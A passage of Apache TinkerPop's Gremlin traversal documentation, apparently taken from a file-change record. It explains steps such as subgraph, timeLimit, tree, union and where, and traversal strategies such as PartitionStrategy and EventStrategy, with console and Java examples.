The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are two results in the `store()` side-effect even though the interval selection is for one object. Realize that when the second object is on its way to the `range()` filter (i.e. `[0..1)`), it passes through `store()` and thus, is stored before being filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store().by('weight')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization, or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the \"knows\" subgraph:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E() <2>\n----\n\n<1> As this function produces \"edge-induced\" subgraphs, `subgraph()` must be called at edge steps.\n<2> The subgraph contains only \"knows\" edges.\n\nA more common subgraphing use case is to get all of the graph structure surrounding a single vertex:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E()\n----\n\n<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.\n\nThere can be multiple `subgraph()` calls within the same traversal, each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).\n\n[gremlin-groovy,modern]\n----\nt = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').\n inV().inE('created').subgraph('createdG').iterate()\nt.sideEffects.get('knowsG').get().traversal(standard()).E()\nt.sideEffects.get('createdG').get().traversal(standard()).E()\n----\n\nIMPORTANT: The `subgraph()`-step only writes to graphs that support user-supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.\n\n[[sum-step]]\nSum Step\n~~~~~~~~\n\nThe `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').sum()\ng.V().repeat(both()).times(3).values('age').sum()\n----\n\nIMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.\n\n[[timelimit-step]]\nTimeLimit Step\n~~~~~~~~~~~~~~\n\nIn many situations, a graph traversal is not about getting an exact answer as it is about getting a relative ranking. A classic example is link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. 
Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.\n\nimage::timelimit-step.png[width=400]\n\nNOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\ng.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\n----\n\nIn essence, the relative order is respected, even though the number of traversers at each vertex is not. The primary benefit is that the calculation is guaranteed to complete within the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.\n\n[[tree-step]]\nTree Step\n~~~~~~~~~\n\nFrom any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http:\/\/en.wikipedia.org\/wiki\/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for this situation.\n\nimage::tree-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().next()\n----\n\nIt is important to see how the paths of all the emanating traversers are united to form the tree.\n\nimage::tree-step2.png[width=500]\n\nThe resultant tree data structure can then be manipulated (see link:http:\/\/www.tinkerpop.com\/javadocs\/current\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/step\/util\/Tree.html[Tree JavaDoc]). For the sake of demonstration, a post-processing lambda is applied in the running example below.\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().by('name').next()\ntree['marko']\ntree['marko']['josh']\ntree.getObjectsAtDepth(3)\n----\n\n[[unfold-step]]\nUnfold Step\n~~~~~~~~~~~\n\nIf the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out().fold().inject('gremlin',[1.23,2.34])\ng.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()\n----\n\nNote that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used for recursive unrolling.\n\n[gremlin-groovy,modern]\n----\ninject(1,[2,3,[4,5,[6]]])\ninject(1,[2,3,[4,5,[6]]]).unfold()\ninject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(unfold().count().is(1l)).unfold()\n----\n\n[[union-step]]\nUnion Step\n~~~~~~~~~~\n\nimage::union-step.png[width=650]\n\nThe `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. 
The traversers emitted from `union()` are the outputs of the respective internal traversals.\n\n[gremlin-groovy,modern]\n----\ng.V(4).union(\n __.in().values('age'),\n out().values('lang'))\ng.V(4).union(\n __.in().values('age'),\n out().values('lang')).path()\n----\n\n[[valuemap-step]]\nValueMap Step\n~~~~~~~~~~~~~\n\nThe `valueMap()`-step yields a Map representation of the properties of an element.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap()\ng.V().valueMap('age')\ng.V().valueMap('age','blah')\ng.E().valueMap()\n----\n\nIt is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>> which support multiple values per key. Using the <<the-crew-toy-graph,\"The Crew\">> toy graph, the point is made explicit.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap()\ng.V().has('name','marko').properties('location')\ng.V().has('name','marko').properties('location').valueMap()\n----\n\nIf the `id`, `label`, `key`, and `value` of the `Element` are desired, then a boolean triggers their insertion into the returned map.\n\n[gremlin-groovy,theCrew]\n----\ng.V().hasLabel('person').valueMap(true)\ng.V().hasLabel('person').valueMap(true,'name')\ng.V().hasLabel('person').properties('location').valueMap(true)\n----\n\n[[vertex-steps]]\nVertex Steps\n~~~~~~~~~~~~\n\nimage::vertex-steps.png[width=350]\n\nThe vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, it is possible to \"move\" on the graph -- i.e. traverse.\n\n* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.\n* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.\n* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.\n* `outE(string...)`: Move to the outgoing incident edges given the edge labels.\n* `inE(string...)`: Move to the incoming incident edges given the edge labels.\n* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.\n* `outV()`: Move to the outgoing vertex.\n* `inV()`: Move to the incoming vertex.\n* `bothV()`: Move to both vertices.\n* `otherV()`: Move to the vertex that was not the vertex that was moved from.\n\n[gremlin-groovy,modern]\n----\ng.V(4)\ng.V(4).outE() <1>\ng.V(4).inE('knows') <2>\ng.V(4).inE('created') <3>\ng.V(4).bothE('knows','created','blah')\ng.V(4).bothE('knows','created','blah').otherV()\ng.V(4).both('knows','created','blah')\ng.V(4).outE().inV() <4>\ng.V(4).out() <5>\ng.V(4).inE().outV()\ng.V(4).inE().bothV()\n----\n\n<1> All outgoing edges.\n<2> All incoming knows-edges.\n<3> All incoming created-edges.\n<4> Moving forward touching edges and vertices.\n<5> Moving forward only touching vertices.\n\n[[where-step]]\nWhere Step\n~~~~~~~~~~\n\nThe `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). 
This step is typically used in conjunction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.withSideEffect('a'){['josh','peter']}.V(1).out('created').in('created').values('name').where(within('a')) <2>\ng.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>\n----\n\n<1> Who are marko's collaborators, where marko cannot be his own collaborator? (predicate)\n<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)\n<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)\n\nIMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.\n\n[[a-note-on-barrier-steps]]\nA Note on Barrier Steps\n-----------------------\n\nimage:barrier.png[width=165,float=right] Gremlin is primarily a link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start\/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a \"barrier step\" exists. There are three types of barriers:\n\n . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being \"drained\" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>.\n . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single \"reduced value\" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.\n . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.\n\nIn Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What it can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.\n\n[[a-note-on-lambdas]]\nA Note On Lambdas\n-----------------\n\nimage:lambda.png[width=150,float=right] A link:http:\/\/en.wikipedia.org\/wiki\/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. 
However, it is advised to avoid using lambdas if possible.\n\n[gremlin-groovy,modern]\n----\ng.V().filter{it.get().value('name') == 'marko'}.\n flatMap{it.get().vertices(OUT,'created')}.\n map {it.get().value('name')} <1>\ng.V().has('name','marko').out('created').values('name') <2>\n----\n\n<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)\n<2> The same traversal (result), but without using lambdas. (*good*)\n\nGremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason is that lambdas cannot be optimized by Gremlin's compiler strategies, as they cannot be programmatically inspected (see <<traversalstrategy,traversal strategies>>).\n\nIn many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields fewer objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 level (*optimization*).\n * There is a more efficient way to express the traversal at the graph vendor level (*vendor optimization*).\n * There are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream()\n .filter(step -> !TraversalHelper.isLabeled(step))\n .forEach(step -> traversal.removeStep(step));\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any unlabeled `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. 
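The effect of the strategy can be observed from the Gremlin Console by comparing a traversal's string form before and after iteration (iterating triggers strategy application), in the same manner as the TinkerGraph example further below. A minimal sketch, assuming `IdentityRemovalStrategy` is registered as a default strategy in this release:\n\n[gremlin-groovy,modern]\n----\nt = g.V().identity().as('x').identity().out(); null \/\/ one labeled and one unlabeled identity()\nt.toString() \/\/ before strategies are applied -- both IdentityStep instances present\nt.iterate(); null \/\/ iterating applies the registered strategies\nt.toString() \/\/ after strategies are applied -- the unlabeled identity() should be gone\n----\n\n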
For those traversal strategies that require other strategies to execute before or after them, the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` instances are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its priors and posts can reference strategies within any category.\n\nAn example of a `VendorOptimizationStrategy` is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in an `O(|V|)` or `O(log(|V|))` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.VendorOptimizationStrategy> implements TraversalStrategy.VendorOptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (true) {\n if (currentStep instanceof HasContainerHolder) {\n tinkerGraphStep.hasContainers.addAll(((HasContainerHolder) currentStep).getHasContainers());\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n } else {\n break;\n }\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. It is then up to `TinkerGraphStep` to determine if an appropriate index exists. In `TinkerGraphStep`'s `vertices()` method, if an index exists for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied. Given that the strategy uses non-TinkerPop3 provided steps, it should go into the `VendorOptimizationStrategy` category to ensure the added step does not corrupt the `OptimizationStrategy` strategies.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nA collection of useful `DecorationStrategy` strategies is provided with TinkerPop3 and is generally useful to end-users. The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. 
Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV(id,'42a')\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically and do not allow them to be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indices under the hood.\n\n[source,groovy]\n----\ngremlin> graph = Neo4jGraph.open('\/tmp\/neo4j')\n==>neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]]\ngremlin> strategy = ElementIdStrategy.build().create()\n==>ElementIdStrategy\ngremlin> g = GraphTraversalSource.build().with(strategy).create(graph)\n==>graphtraversalsource[neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]], standard]\ngremlin> g.addV(id, '42a').id()\n==>42a\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. Graphs that do not support transactions will generate events immediately upon mutation, while those graphs that support transactions will queue the mutations until that transaction is committed and will then raise the events. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal`, first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nThe example above uses TinkerGraph which does not support transactions. As mentioned previously, for these types of graph implementations events are raised as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised.\n\nCAUTION: `EventStrategy` is not meant for use in tracking global mutations across separate processes. In other words, a mutation in one JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). 
The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. a tail vertex in one partition and a head vertex in another).\n\nThere are three primary variables in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Predicate` defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nvertexCriterion = { vertex -> true }\nedgeCriterion = { edge -> edge.id() >= 8 && edge.id() <= 10}\nstrategy = SubgraphStrategy.build().vertexPredicate(vertexCriterion).edgePredicate(edgeCriterion).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices as they all pass the vertexCriterion\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nNote that `SubgraphStrategy` directly passes the edge and vertex criterion `Predicate` objects to an injected `filter` step and as such may not take advantage of important optimizations provided by the various `Graph` implementations (given the use of lambda expressions).\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>`, which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. GraphTraversal provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps so that the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` can be spawned off of a Graph, Vertex, Edge, or VertexProperty. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) is provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. 
In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are five generic steps from which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has the person label.\n<2> The more specific `hasLabel()`-step is implemented as a `filter()` with the respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nIt is possible to mutate the graph within a traversal. The typical mutations are adding\/removing vertices, edges, and properties. 
To add edges, there is a collection of `addE()`-steps (*map*\/*sideEffect*).\n\n[gremlin-groovy,modern]\n----\ng.V(1).addOutE('co-worker',g.V(2),'year',2009) <1>\ng.V(4).addInE('createdBy',g.V(3,5)) <2>\ng.V(1).addOutE('livesNear',g.V(2),'year',2009).inV().inE('livesNear').values('year') <3>\ng.V(1).out('livesNear')\n----\n\n<1> Add an outgoing co-worker edge from the marko-vertex to the vadas-vertex with a year property of value 2009.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> The newly created edge is a traversable object.\n\nimage::addedge-step.png[width=450]\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit in the data what is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is defined by the traversal description. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created')\ng.V(1).as('a').out('created').in('created')\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addOutE('co-developer','a').outV().\n addInE('co-developer','a')\ng.V(1).out('co-developer').values('name')\ng.V(1).in('co-developer').values('name')\n----\n\n<1> Marko can't be a co-developer with himself.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV(label,'person','name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into 